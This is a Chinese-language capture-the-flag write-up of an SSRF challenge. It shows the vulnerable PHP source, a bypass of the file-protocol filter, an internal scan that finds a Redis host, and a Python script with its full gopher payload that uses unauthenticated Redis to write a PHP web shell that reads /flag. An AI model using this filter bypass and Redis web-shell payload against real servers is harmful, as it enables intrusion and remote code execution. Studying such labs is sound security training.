查看源码发现提示:
在url里访问一下:
得到一串ifconfig的结果,整理一下的:
eth0 Link encap:Ethernet HWaddr 02:42:ad:62:04:0a
inet addr:173.96.119.10 Bcast:173.98.4.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1450 Metric:1
RX packets:93 errors:0 dropped:0 overruns:0 frame:0
TX packets:116 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:16125 (16.1 KB) TX bytes:18113 (18.1 KB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:24 errors:0 dropped:0 overruns:0 frame:0
TX packets:24 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:1376 (1.3 KB) TX bytes:1376 (1.3 KB)
给了ip,想一想也知道这应该是个ssrf的题。我们试一下file协议读文件:
发现file协议被过滤了,我们可以尝试绕过:file:/
、file:<空格>///
得到源码:
<?php
function curl($url){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, 0);
echo curl_exec($ch);
curl_close($ch);
}
if(isset($_GET['submit'])){
$url = $_GET['url'];
//echo $url."\n";
if(preg_match('/file\:\/\/|dict|\.\.\/|127.0.0.1|localhost/is', $url,$match))
{
//var_dump($match);
die('别这样');
}
curl($url);
}
if(isset($_GET['secret'])){
system('ifconfig');
}
?>
从源码中可知过滤了file协议、dict协议、127.0.0.1和localhost,但没有过滤http协议和gopher协议
我们使用http协议进行内网主机存活探测。用burp抓包,跑字典:
这里扫到了173.96.119.6/5/7/10/11,这几台主机都存活,在看到173.96.119.11这台机子时给出了提示:
说让试试不同的端口(服务)。应该是猜测6379端口(redis)或3306端口(mysql)。发现是6379端口。
再次抓包跑字典:
然后这里需要将线程调低点,不然访问太快容易429
扫描到6379端口,redis服务,我们利用redis未授权访问的漏洞,在根目录下生成个文件shell.php
,这里的dict协议也被过滤了,所以得用gopher协议。大神的脚本:
import urllib
protocol="gopher://"
ip="173.96.119.11" // 运行有redis的主机ip
port="6379"
shell="\n\n<?php system(\"cat /flag\");?>\n\n"
filename="shell.php"
path="/var/www/html"
passwd=""
cmd=["flushall",
"set 1 {}".format(shell.replace(" ","${IFS}")),
"config set dir {}".format(path),
"config set dbfilename {}".format(filename),
"save"
]
if passwd:
cmd.insert(0,"AUTH {}".format(passwd))
payload=protocol+ip+":"+port+"/_"
def redis_format(arr):
CRLF="\r\n"
redis_arr = arr.split(" ")
cmd=""
cmd+="*"+str(len(redis_arr))
for x in redis_arr:
cmd+=CRLF+"$"+str(len((x.replace("${IFS}"," "))))+CRLF+x.replace("${IFS}"," ")
cmd+=CRLF
return cmd
if __name__=="__main__":
for x in cmd:
payload += urllib.quote(redis_format(x))
print payload
运行上面脚本得到ssrf的payload:
gopher://173.96.119.11:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2432%0D%0A%0A%0A%3C%3Fphp%20system%28%22cat%20/flag%22%29%3B%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A
将生成的payload打过去,在根目录下生成个文件shell.php
发现这样不行,payload还必须在那个框中输入,应该是编码的问题,不然直接在url里打就行了或在kali中:
在那个框中输入
之后再访问http://173.96.119.11/shell.php